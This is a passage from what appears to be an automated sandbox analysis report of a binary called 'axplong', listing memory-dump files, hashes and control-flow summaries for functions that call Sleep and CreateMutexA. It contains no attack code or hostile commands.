                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID: $2m
                                                                                                                                                                                                                                                    • API String ID: 1464230837-511082170
                                                                                                                                                                                                                                                    • Opcode ID: 87ffa624e02b20c9435b40b65b3f73d54dc4208e760b757b3fe878e0c8557d05
                                                                                                                                                                                                                                                    • Instruction ID: ce52a6e4f7f18b7ea79c607a5537c2648035c641ec5e2736eec342a492f250df
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87ffa624e02b20c9435b40b65b3f73d54dc4208e760b757b3fe878e0c8557d05
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E312A31B101009BEB18DBB8DC88BADB7A39FC6320F20865DE418AB7D5D73599818762
                                                                                                                                                                                                                                                    Function 00679FA9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 56 679fa9-679fc9 60 679ff7-67a013 56->60 61 679fcb-679fd7 56->61 64 67a015-67a021 60->64 65 67a041-67a060 60->65 62 679fed-679ff4 call 68d593 61->62 63 679fd9-679fe7 61->63 62->60 63->62 66 67a860 63->66 68 67a037-67a03e call 68d593 64->68 69 67a023-67a031 64->69 70 67a062-67a06e 65->70 71 67a08e-67a846 call 687f30 65->71 75 67a883-67a8c4 Sleep CreateMutexA 66->75 76 67a860 call 6a6b9a 66->76 68->65 69->66 69->68 72 67a084-67a08b call 68d593 70->72 73 67a070-67a07e 70->73 72->71 73->66 73->72 85 67a8d7-67a8d8 75->85 86 67a8c6-67a8c8 75->86 76->75 86->85 88 67a8ca-67a8d5 86->88 88->85
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0067A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,006D3224), ref: 0067A8B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID: $2m
                                                                                                                                                                                                                                                    • API String ID: 1464230837-511082170
                                                                                                                                                                                                                                                    • Opcode ID: 173d2a4ae95a1c3783b795ea5dd22fbd737610cd58e26a8459cc0a4db00b4bd1
                                                                                                                                                                                                                                                    • Instruction ID: 7c944f3a426661ea6d5ca931311dfad287cdf57a8fa74338fccb2246705d7b97
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 173d2a4ae95a1c3783b795ea5dd22fbd737610cd58e26a8459cc0a4db00b4bd1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20314A31B101009BEB189BB8DC88BACB7639FC6324F20C61DE4189B7D5D77599818767
                                                                                                                                                                                                                                                    Function 0067A0DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 90 67a0de-67a0fe 94 67a100-67a10c 90->94 95 67a12c-67a148 90->95 96 67a122-67a129 call 68d593 94->96 97 67a10e-67a11c 94->97 98 67a176-67a195 95->98 99 67a14a-67a156 95->99 96->95 97->96 102 67a865-67a8c4 call 6a6b9a Sleep CreateMutexA 97->102 100 67a197-67a1a3 98->100 101 67a1c3-67a846 call 687f30 98->101 104 67a16c-67a173 call 68d593 99->104 105 67a158-67a166 99->105 107 67a1a5-67a1b3 100->107 108 67a1b9-67a1c0 call 68d593 100->108 120 67a8d7-67a8d8 102->120 121 67a8c6-67a8c8 102->121 104->98 105->102 105->104 107->102 107->108 108->101 121->120 122 67a8ca-67a8d5 121->122 122->120
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0067A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,006D3224), ref: 0067A8B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID: $2m
                                                                                                                                                                                                                                                    • API String ID: 1464230837-511082170
                                                                                                                                                                                                                                                    • Opcode ID: b80b7234c16342c37cde445a183ddd38fa2c26161e69a0cd75b902f3f8762ea0
                                                                                                                                                                                                                                                    • Instruction ID: 900c061af40f8850affbabf0d42bfe0ab475f9fb1607e56ef6bc52b568bd2865
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b80b7234c16342c37cde445a183ddd38fa2c26161e69a0cd75b902f3f8762ea0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48312531B101009BEB189BB8DC88BADB7639FC6320F20876DE418AB7D6D73599818753
                                                                                                                                                                                                                                                    Function 0067A348 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 124 67a348-67a368 128 67a396-67a3b2 124->128 129 67a36a-67a376 124->129 132 67a3b4-67a3c0 128->132 133 67a3e0-67a3ff 128->133 130 67a38c-67a393 call 68d593 129->130 131 67a378-67a386 129->131 130->128 131->130 134 67a86f-67a87e call 6a6b9a * 3 131->134 136 67a3d6-67a3dd call 68d593 132->136 137 67a3c2-67a3d0 132->137 138 67a401-67a40d 133->138 139 67a42d-67a846 call 687f30 133->139 157 67a883-67a8c4 Sleep CreateMutexA 134->157 158 67a87e call 6a6b9a 134->158 136->133 137->134 137->136 140 67a423-67a42a call 68d593 138->140 141 67a40f-67a41d 138->141 140->139 141->134 141->140 160 67a8d7-67a8d8 157->160 161 67a8c6-67a8c8 157->161 158->157 161->160 162 67a8ca-67a8d5 161->162 162->160
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0067A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,006D3224), ref: 0067A8B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
